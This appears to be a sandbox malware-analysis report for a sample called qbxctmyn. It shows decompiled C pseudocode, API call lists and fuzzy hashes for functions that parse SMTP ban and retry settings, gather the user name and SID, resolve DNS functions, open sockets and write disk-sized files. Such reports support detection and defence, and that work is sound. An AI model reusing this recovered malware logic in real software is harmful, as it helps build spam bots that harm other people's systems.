                                                                                0x00402d31
                                                                                0x00402d32
                                                                                0x00402d33
                                                                                0x00402d39
                                                                                0x00402d3a
                                                                                0x00402d40
                                                                                0x00402d44
                                                                                0x00402d5b
                                                                                0x00402d61
                                                                                0x00402d69
                                                                                0x00402d54
                                                                                0x00000000
                                                                                0x00402d54
                                                                                0x00402d6b
                                                                                0x00402d6c
                                                                                0x00402d6f
                                                                                0x00402d70
                                                                                0x00402d71
                                                                                0x00402d72
                                                                                0x00402d74
                                                                                0x00402d7b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402d7d
                                                                                0x00402d80
                                                                                0x00402d83
                                                                                0x00402d88
                                                                                0x00402deb
                                                                                0x00000000
                                                                                0x00402deb
                                                                                0x00402d90
                                                                                0x00402d95
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402da6
                                                                                0x00402daa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402db0
                                                                                0x00402db9
                                                                                0x00402dc1
                                                                                0x00402dc7
                                                                                0x00402dcb
                                                                                0x00402dd1
                                                                                0x00402dd4
                                                                                0x00402dd9
                                                                                0x00402de0
                                                                                0x00402ddb
                                                                                0x00402ddb
                                                                                0x00402ddb
                                                                                0x00402de2
                                                                                0x00402de2
                                                                                0x00402de4
                                                                                0x00402de6
                                                                                0x00000000
                                                                                0x00402dea
                                                                                0x00402d4a
                                                                                0x00402d52
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,74D0EA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 00402D61
                                                                                • GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 00402D99
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00402DA0
                                                                                • lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 00402DCB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcesslstrcpyn
                                                                                • String ID: DnsQuery_A$dnsapi.dll
                                                                                • API String ID: 3560063639-3847274415
                                                                                • Opcode ID: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
                                                                                • Instruction ID: e5e1ee734cbcfb8ca4eff609f7c37a2f42b45bda1feb54b0ffc2340cedddb21a
                                                                                • Opcode Fuzzy Hash: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
                                                                                • Instruction Fuzzy Hash: 25214F7190022AABCB11AB55DD48AEFBBB8EF08750F104432F905B7290D7F49E8587D8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040BE31 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 152stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E0040BE31(signed int _a4, intOrPtr _a8) {
				signed int _v8;
				CHAR* _v12;
				int _v16;
				int _t50;
				int _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t57;
				void* _t59;
				char* _t66;
				CHAR* _t68;
				int _t71;
				int _t72;
				void* _t76;
				intOrPtr _t78;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				intOrPtr* _t86;
				void* _t88;
				void* _t91;
				void* _t92;

				_t83 = _a4;
				_t68 = _t83 + 4;
				_v12 = _t68;
				if(lstrcmpiA(_t68, "smtp_herr") == 0 || lstrcmpiA(_t68, "smtp_ban") == 0) {
					L3:
					_t72 = 0;
					_v16 = 0;
					if(_a8 == 3) {
						L25:
						if(lstrcmpiA(_v12, "smtp_herr") != 0) {
							if(lstrcmpiA(_v12, "smtp_ban") != 0) {
								_t50 = lstrcmpiA(_v12, "smtp_retr");
								_t51 = 0x413638;
								if(_t50 != 0) {
									_t51 = _a4;
								}
							} else {
								_t51 = 0x413634;
							}
						} else {
							_t51 = 0x413630;
						}
						_t86 =  *_t51;
						 *_t51 = _v16;
						if(_t86 == 0) {
							goto L36;
						} else {
							_t52 =  *_t86;
							_t84 = 0;
							while(_t52 != 0) {
								E0040EC2E(_t52);
								_t84 = _t84 + 1;
								_t52 =  *((intOrPtr*)(_t86 + _t84 * 4));
							}
							return E0040EC2E(_t86);
						}
					}
					_t55 =  *((intOrPtr*)(_t83 + 0x18));
					_t82 = 0;
					if(_t55 <= 0) {
						goto L25;
					} else {
						goto L5;
					}
					do {
						L5:
						if( *((char*)(_t83 + _t72 + 0x24)) == 0xa || _t72 == _t55 - 1) {
							_t82 = _t82 + 1;
						}
						_t72 = _t72 + 1;
					} while (_t72 < _t55);
					if(_t82 == 0) {
						goto L25;
					}
					_t70 = 4 + _t82 * 4;
					_t51 = E0040EBCC(4 + _t82 * 4);
					_pop(_t76);
					_v16 = _t51;
					if(_t51 == 0) {
						goto L36;
					}
					E0040EE2A(_t76, _t51, 0, _t70);
					_t57 =  *((intOrPtr*)(_t83 + 0x18));
					_v8 = _v8 & 0x00000000;
					_a4 = _a4 & 0x00000000;
					_t92 = _t91 + 0xc;
					if(_t57 > 0) {
						_t71 = _v16;
						do {
							_t78 =  *((intOrPtr*)(_t83 + _a4 + 0x24));
							if(_t78 == 0xa || _a4 == _t57 - 1) {
								_t88 = _a4 - _v8;
								if(_t78 != 0xa) {
									_t88 = _t88 + 1;
								}
								_t25 = _t88 + 1; // 0x1
								_t59 = E0040EBCC(_t25);
								 *_t71 = _t59;
								if(_t59 == 0) {
									goto L25;
								} else {
									E0040EE08(_t59, _t83 + _v8 + 0x24, _t88);
									_t92 = _t92 + 0xc;
									 *((char*)(_t88 +  *_t71)) = 0;
									if(_t88 > 0) {
										_t31 =  *_t71 - 1; // -1
										_t66 = _t88 + _t31;
										if( *_t66 == 0xd) {
											 *_t66 = 0;
										}
									}
									_t71 = _t71 + 4;
									_v8 = _v8 + _t88 + 1;
									goto L22;
								}
							}
							L22:
							_a4 = _a4 + 1;
							_t57 =  *((intOrPtr*)(_t83 + 0x18));
						} while (_a4 < _t57);
					}
					goto L25;
				} else {
					_t51 = lstrcmpiA(_t68, "smtp_retr");
					if(_t51 != 0) {
						L36:
						return _t51;
					}
					goto L3;
				}
			}

























                                                                                0x0040be40
                                                                                0x0040be43
                                                                                0x0040be4c
                                                                                0x0040be53
                                                                                0x0040be71
                                                                                0x0040be71
                                                                                0x0040be77
                                                                                0x0040be7a
                                                                                0x0040bf62
                                                                                0x0040bf6e
                                                                                0x0040bf83
                                                                                0x0040bf94
                                                                                0x0040bf98
                                                                                0x0040bf9d
                                                                                0x0040bf9f
                                                                                0x0040bf9f
                                                                                0x0040bf85
                                                                                0x0040bf85
                                                                                0x0040bf85
                                                                                0x0040bf70
                                                                                0x0040bf70
                                                                                0x0040bf70
                                                                                0x0040bfa2
                                                                                0x0040bfa7
                                                                                0x0040bfab
                                                                                0x00000000
                                                                                0x0040bfad
                                                                                0x0040bfad
                                                                                0x0040bfaf
                                                                                0x0040bfbe
                                                                                0x0040bfb4
                                                                                0x0040bfb9
                                                                                0x0040bfba
                                                                                0x0040bfbd
                                                                                0x00000000
                                                                                0x0040bfc8
                                                                                0x0040bfab
                                                                                0x0040be80
                                                                                0x0040be83
                                                                                0x0040be87
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040be8d
                                                                                0x0040be8d
                                                                                0x0040be92
                                                                                0x0040be9b
                                                                                0x0040be9b
                                                                                0x0040be9c
                                                                                0x0040be9d
                                                                                0x0040bea3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040bea9
                                                                                0x0040beb1
                                                                                0x0040beb6
                                                                                0x0040beb7
                                                                                0x0040bebc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040bec6
                                                                                0x0040becb
                                                                                0x0040bece
                                                                                0x0040bed2
                                                                                0x0040bed6
                                                                                0x0040bedb
                                                                                0x0040bee1
                                                                                0x0040bee4
                                                                                0x0040bee7
                                                                                0x0040beee
                                                                                0x0040bef9
                                                                                0x0040beff
                                                                                0x0040bf01
                                                                                0x0040bf01
                                                                                0x0040bf02
                                                                                0x0040bf06
                                                                                0x0040bf0c
                                                                                0x0040bf10
                                                                                0x00000000
                                                                                0x0040bf12
                                                                                0x0040bf1c
                                                                                0x0040bf23
                                                                                0x0040bf26
                                                                                0x0040bf2c
                                                                                0x0040bf30
                                                                                0x0040bf30
                                                                                0x0040bf37
                                                                                0x0040bf39
                                                                                0x0040bf39
                                                                                0x0040bf37
                                                                                0x0040bf49
                                                                                0x0040bf4c
                                                                                0x00000000
                                                                                0x0040bf4c
                                                                                0x0040bf10
                                                                                0x0040bf4f
                                                                                0x0040bf4f
                                                                                0x0040bf52
                                                                                0x0040bf55
                                                                                0x0040bf5a
                                                                                0x00000000
                                                                                0x0040be61
                                                                                0x0040be67
                                                                                0x0040be6b
                                                                                0x0040bfcd
                                                                                0x0040bfcd
                                                                                0x0040bfcd
                                                                                0x00000000
                                                                                0x0040be6b

                                                                                APIs
                                                                                • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BE4F
                                                                                • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BE5B
                                                                                • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BE67
                                                                                • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BF6A
                                                                                • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BF7F
                                                                                • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BF94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmpi
                                                                                • String ID: smtp_ban$smtp_herr$smtp_retr
                                                                                • API String ID: 1586166983-1625972887
                                                                                • Opcode ID: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
                                                                                • Instruction ID: 5eb9e18a275db8e61a6fe50fd05ed02ec51c2bbb25542f34a2f5cec7b259a8e4
                                                                                • Opcode Fuzzy Hash: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
                                                                                • Instruction Fuzzy Hash: 98519F71A0021AEEDB119B65DD40B9ABBA9EF04344F14407BE845FB291D738E9818FDC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406A60 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00406A60(int __edx, CHAR* _a4, intOrPtr _a8, int _a12) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				void* _v12;
				long _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				long _v32;
				void* _t31;
				intOrPtr _t43;
				int _t44;
				void* _t53;
				int _t59;
				CHAR* _t68;
				void* _t69;
				int _t73;

				_t59 = __edx;
				_t68 = _a4;
				_t31 = CreateFileA(_t68, 0x40000000, 0, 0, 2, 0x80, 0);
				_v12 = _t31;
				if(_t31 == 0xffffffff) {
					 *0x412180 = 0x61040101;
					 *0x41217c = GetLastError();
					__eflags = 0;
					return 0;
				}
				_v8 =  *_t68;
				_v7 = _t68[1];
				_t63 = _a12;
				_v6 = _t68[2];
				_v5 = 0;
				if(GetDiskFreeSpaceA( &_v8,  &_v20,  &_v24,  &_v16,  &_v32) == 0) {
					L10:
					_t43 = E00406987(0x500000, _v12, _a8, _a12, _t63);
					_v28 = _t43;
					if(_t43 != 0) {
						_t44 = CloseHandle(_v12);
						__eflags = _t44;
						if(_t44 != 0) {
							L15:
							return _v28;
						}
						 *0x412180 = 0x61040103;
						 *0x41217c = GetLastError();
						CloseHandle(_v12);
						L14:
						DeleteFileA(_t68);
						goto L15;
					}
					 *0x412180 = 0x61040102;
					 *0x41217c = GetLastError();
					CloseHandle(_v12);
					goto L14;
				}
				_t53 = E0040EB0E(_v20 * _v24, 0, _v16, 0);
				_t69 = _t69 + 0x10;
				_t73 = _t59;
				if(_t73 < 0) {
					goto L10;
				}
				if(_t73 > 0 || _t53 > 0x6400000) {
					_t22 = E0040ECA5() % 0x500000 + 0xa00000; // 0xa00000
					_t63 = _t22;
					goto L10;
				} else {
					__eflags = _t59;
					if(__eflags < 0) {
						goto L10;
					}
					if(__eflags > 0) {
						L9:
						_t63 = (E0040ECA5() & 0x001fffff) + 0x300000;
						__eflags = (E0040ECA5() & 0x001fffff) + 0x300000;
						goto L10;
					}
					__eflags = _t53 - 0x3200000;
					if(_t53 <= 0x3200000) {
						goto L10;
					}
					goto L9;
				}
			}





















                                                                                0x00406a60
                                                                                0x00406a68
                                                                                0x00406a7d
                                                                                0x00406a83
                                                                                0x00406a89
                                                                                0x00406b8c
                                                                                0x00406b9c
                                                                                0x00406ba1
                                                                                0x00000000
                                                                                0x00406ba1
                                                                                0x00406a91
                                                                                0x00406a97
                                                                                0x00406a9e
                                                                                0x00406aa1
                                                                                0x00406ab8
                                                                                0x00406ac3
                                                                                0x00406b1d
                                                                                0x00406b27
                                                                                0x00406b2f
                                                                                0x00406b34
                                                                                0x00406b5f
                                                                                0x00406b61
                                                                                0x00406b63
                                                                                0x00406b86
                                                                                0x00000000
                                                                                0x00406b89
                                                                                0x00406b65
                                                                                0x00406b78
                                                                                0x00406b7d
                                                                                0x00406b7f
                                                                                0x00406b80
                                                                                0x00000000
                                                                                0x00406b80
                                                                                0x00406b36
                                                                                0x00406b49
                                                                                0x00406b4e
                                                                                0x00000000
                                                                                0x00406b4e
                                                                                0x00406ad2
                                                                                0x00406ad7
                                                                                0x00406ada
                                                                                0x00406adc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406ade
                                                                                0x00406af5
                                                                                0x00406af5
                                                                                0x00000000
                                                                                0x00406afd
                                                                                0x00406afd
                                                                                0x00406aff
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406b01
                                                                                0x00406b0a
                                                                                0x00406b17
                                                                                0x00406b17
                                                                                0x00000000
                                                                                0x00406b17
                                                                                0x00406b03
                                                                                0x00406b08
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406b08

                                                                                APIs
                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,74CF81D0,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
                                                                                • GetDiskFreeSpaceA.KERNEL32(00409E9D,00409A60,?,?,?,004122F8,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B5F
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B6F
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B7D
                                                                                • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
                                                                                • GetLastError.KERNEL32(?,?,?,00409A60,?,?,00409E9D,?,?,?,?,?,00409E9D,?,00000022,?), ref: 00406B96
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLast$File$CreateDeleteDiskFreeSpace
                                                                                • String ID:
                                                                                • API String ID: 3188212458-0
                                                                                • Opcode ID: f470ed9999743a5fb12dc2784f1c2880128520c421616f03f4739b26db8e28dc
                                                                                • Instruction ID: 425ce4a4a5363573a79131118f251082e1da2794364dd09a1208fe8084ee845e
                                                                                • Opcode Fuzzy Hash: f470ed9999743a5fb12dc2784f1c2880128520c421616f03f4739b26db8e28dc
                                                                                • Instruction Fuzzy Hash: C731E0B2900108BFDB00DFA09D44ADF7F78AF48310F158076E112F7291D674A9608F69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E36778 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 00E367C3
                                                                                • htonl.WS2_32(?), ref: 00E367DF
                                                                                • htonl.WS2_32(?), ref: 00E367EE
                                                                                • GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 00E368F1
                                                                                • ExitProcess.KERNEL32 ref: 00E369BC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Processhtonl$CurrentExitHugeRead
                                                                                • String ID: except_info$localcfg
                                                                                • API String ID: 1150517154-3605449297
                                                                                • Opcode ID: 8c67a5bde2c17ed3aff6f0ea1f646f2c63f3a3fdf38cb08711d1dfe4718764d5
                                                                                • Instruction ID: 5e7c401e611838baac5333ae1437ff3108f9ad8f0c908e3cf1d2fe8233022498
                                                                                • Opcode Fuzzy Hash: 8c67a5bde2c17ed3aff6f0ea1f646f2c63f3a3fdf38cb08711d1dfe4718764d5
                                                                                • Instruction Fuzzy Hash: 79616F71940208AFDB609FB4DC45FEA7BE9FF48300F248066FA6DD2161DA759990CF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E3F57C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • htons.WS2_32(00E3CC84), ref: 00E3F5B4
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 00E3F5CE
                                                                                • closesocket.WS2_32(00000000), ref: 00E3F5DC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: closesockethtonssocket
                                                                                • String ID: time_cfg
                                                                                • API String ID: 311057483-2401304539
                                                                                • Opcode ID: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
                                                                                • Instruction ID: 4a6399c1af0cfc37f2e3811fbf7e86529f780d53bb1fc5e500d7c7f25ed0d362
                                                                                • Opcode Fuzzy Hash: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
                                                                                • Instruction Fuzzy Hash: CC314972900119ABDB119FA5DC89DEEBBBCEF88314F10456AF915E3150E7709A81CBE4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406F5F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E00406F5F(long _a4, long _a8) {
				void* _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				void _v84;
				char _v212;
				CHAR* _t36;
				void* _t53;
				intOrPtr* _t54;
				char _t62;
				void* _t65;
				char* _t66;
				intOrPtr _t67;
				CHAR* _t68;
				void* _t69;

				_t68 = _a4;
				 *_t68 = 0;
				if(GetUserNameA(_t68,  &_a8) == 0) {
					return 0;
				}
				_t36 = _t68;
				_t66 =  &(_t36[1]);
				do {
					_t62 =  *_t36;
					_t36 =  &(_t36[1]);
				} while (_t62 != 0);
				_a8 = _t36 - _t66;
				_a4 = 0x7c;
				_v12 = 0x80;
				if(LookupAccountNameA(0, _t68,  &_v84,  &_a4,  &_v212,  &_v12,  &_v16) == 0) {
					L8:
					_a8 = _a8 + wsprintfA( &(_t68[_a8]), "/%d", E00406EDD());
					return _a8;
				}
				E0040EF00( &(_t68[_a8]), "/");
				_a8 = _a8 + 1;
				_push( &_v8);
				_t53 =  &_v84;
				_push(_t53);
				L0040F4AA();
				if(_t53 == 0) {
					goto L8;
				}
				_t54 = _v8;
				_t20 = _t54 + 1; // 0x121
				_t65 = _t20;
				do {
					_t67 =  *_t54;
					_t54 = _t54 + 1;
				} while (_t67 != 0);
				_a4 = _t54 - _t65;
				E0040EE08( &(_t68[_a8]), _v8, _t54 - _t65 + 1);
				_a8 = _a8 + _a4;
				_t69 = _t69 + 0xc;
				LocalFree(_v8);
				goto L8;
			}

















                                                                                0x00406f6c
                                                                                0x00406f77
                                                                                0x00406f82
                                                                                0x00000000
                                                                                0x00407047
                                                                                0x00406f88
                                                                                0x00406f8a
                                                                                0x00406f8d
                                                                                0x00406f8d
                                                                                0x00406f8f
                                                                                0x00406f90
                                                                                0x00406f96
                                                                                0x00406fb3
                                                                                0x00406fba
                                                                                0x00406fc9
                                                                                0x00407025
                                                                                0x0040703f
                                                                                0x00000000
                                                                                0x00407042
                                                                                0x00406fd6
                                                                                0x00406fdb
                                                                                0x00406fe3
                                                                                0x00406fe4
                                                                                0x00406fe7
                                                                                0x00406fe8
                                                                                0x00406fef
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406ff1
                                                                                0x00406ff4
                                                                                0x00406ff4
                                                                                0x00406ff7
                                                                                0x00406ff7
                                                                                0x00406ff9
                                                                                0x00406ffa
                                                                                0x00407000
                                                                                0x0040700e
                                                                                0x00407016
                                                                                0x00407019
                                                                                0x0040701f
                                                                                0x00000000

                                                                                APIs
                                                                                • GetUserNameA.ADVAPI32(?,0040D7C3), ref: 00406F7A
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,0040D7C3), ref: 00406FC1
                                                                                • ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 00406FE8
                                                                                • LocalFree.KERNEL32(00000120), ref: 0040701F
                                                                                • wsprintfA.USER32 ref: 00407036
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
                                                                                • String ID: /%d$|
                                                                                • API String ID: 676856371-4124749705
                                                                                • Opcode ID: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
                                                                                • Instruction ID: 25602f0bb6ce76eb5d01febd46d0227a680cec7408ef54ec30c82d1084126da1
                                                                                • Opcode Fuzzy Hash: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
                                                                                • Instruction Fuzzy Hash: B5313C72900209BFDB01DFA5DC45BDB7BBCEF04314F048166F949EB241DA79EA588B98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E32F88 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 85memorylibrarystringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(?), ref: 00E32FA1
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00E32FB1
                                                                                • GetProcAddress.KERNEL32(00000000,004103F0), ref: 00E32FC8
                                                                                • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00E33000
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E33007
                                                                                • lstrcpyn.KERNEL32(00000008,?,000000FF), ref: 00E33032
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AddressAllocateHandleLibraryLoadModuleProcProcesslstrcpyn
                                                                                • String ID: dnsapi.dll
                                                                                • API String ID: 1242400761-3175542204
                                                                                • Opcode ID: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
                                                                                • Instruction ID: 56cf540a316d673c938d3197f65eb8a0202f9cbc5187a8c851748cf7c0ce225b
                                                                                • Opcode Fuzzy Hash: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
                                                                                • Instruction Fuzzy Hash: 1F217C71A00229ABCB219BA4DC48AAEBFB8EF08B14F104425F941B7150D7B49E81CBE4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406CC9 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 84libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 80%
                                                                                			E00406CC9(void* __ecx) {
				_Unknown_base(*)()* _t8;
				CHAR* _t17;
				void* _t18;
				void* _t23;
				char _t25;
				void* _t34;

				_t23 = __ecx;
				if( *0x412e08 != 0) {
					L14:
					return 0x412e08;
				}
				_t8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemWow64DirectoryA");
				if(_t8 == 0) {
					L4:
					if(GetSystemDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
						if(GetWindowsDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
							E0040EF00(0x412e08, E00402544(0x4122f8, 0x410664, 0xb, 0xe4, 0xc8));
							E0040EE2A(_t23, 0x4122f8, 0, 0x100);
							_t34 = _t34 + 0x28;
						}
						E0040EF1E(0x412e08, E00402544(0x4122f8, 0x410658, 0xb, 0xe4, 0xc8));
						E0040EE2A(_t23, 0x4122f8, 0, 0x100);
					}
					L10:
					_t17 = 0x412e08;
					goto L11;
					L11:
					_t25 =  *_t17;
					_t17 =  &(_t17[1]);
					if(_t25 != 0) {
						goto L11;
					} else {
						_t18 = _t17 - 0x412e09;
						if( *((char*)(_t18 + 0x412e07)) != 0x5c) {
							 *((char*)(_t18 + 0x412e08)) = 0x5c;
							 *((char*)(_t18 + 0x412e09)) = _t25;
						}
						goto L14;
					}
				}
				_push(0x104);
				_push(0x412e08);
				if( *_t8() == 0 ||  *0x412e08 == 0) {
					goto L4;
				} else {
					goto L10;
				}
			}









                                                                                0x00406cc9
                                                                                0x00406cd6
                                                                                0x00406dbe
                                                                                0x00406dc1
                                                                                0x00406dc1
                                                                                0x00406cee
                                                                                0x00406cfb
                                                                                0x00406d12
                                                                                0x00406d1c
                                                                                0x00406d40
                                                                                0x00406d60
                                                                                0x00406d69
                                                                                0x00406d6e
                                                                                0x00406d6e
                                                                                0x00406d86
                                                                                0x00406d8f
                                                                                0x00406d98
                                                                                0x00406d99
                                                                                0x00406d99
                                                                                0x00406d9e
                                                                                0x00406d9f
                                                                                0x00406d9f
                                                                                0x00406da1
                                                                                0x00406da4
                                                                                0x00000000
                                                                                0x00406da6
                                                                                0x00406da6
                                                                                0x00406daf
                                                                                0x00406db1
                                                                                0x00406db8
                                                                                0x00406db8
                                                                                0x00000000
                                                                                0x00406daf
                                                                                0x00406da4
                                                                                0x00406cfd
                                                                                0x00406cfe
                                                                                0x00406d03
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,004122F8,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00406D14
                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                • String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$kernel32
                                                                                • API String ID: 1082366364-3395550214
                                                                                • Opcode ID: 174e8731fdbdc44ab974895aa40a4ab233de6b35a5efa5658db69bb206ac9e39
                                                                                • Instruction ID: 283af98db633f334a3c96cb566aa979ace8a56c3c0d7b64ee1e11c7fdc897f47
                                                                                • Opcode Fuzzy Hash: 174e8731fdbdc44ab974895aa40a4ab233de6b35a5efa5658db69bb206ac9e39
                                                                                • Instruction Fuzzy Hash: AC21F26174034479F72157225D89FF72E4C8F52744F19407AF804B62D2CAED88E582AD
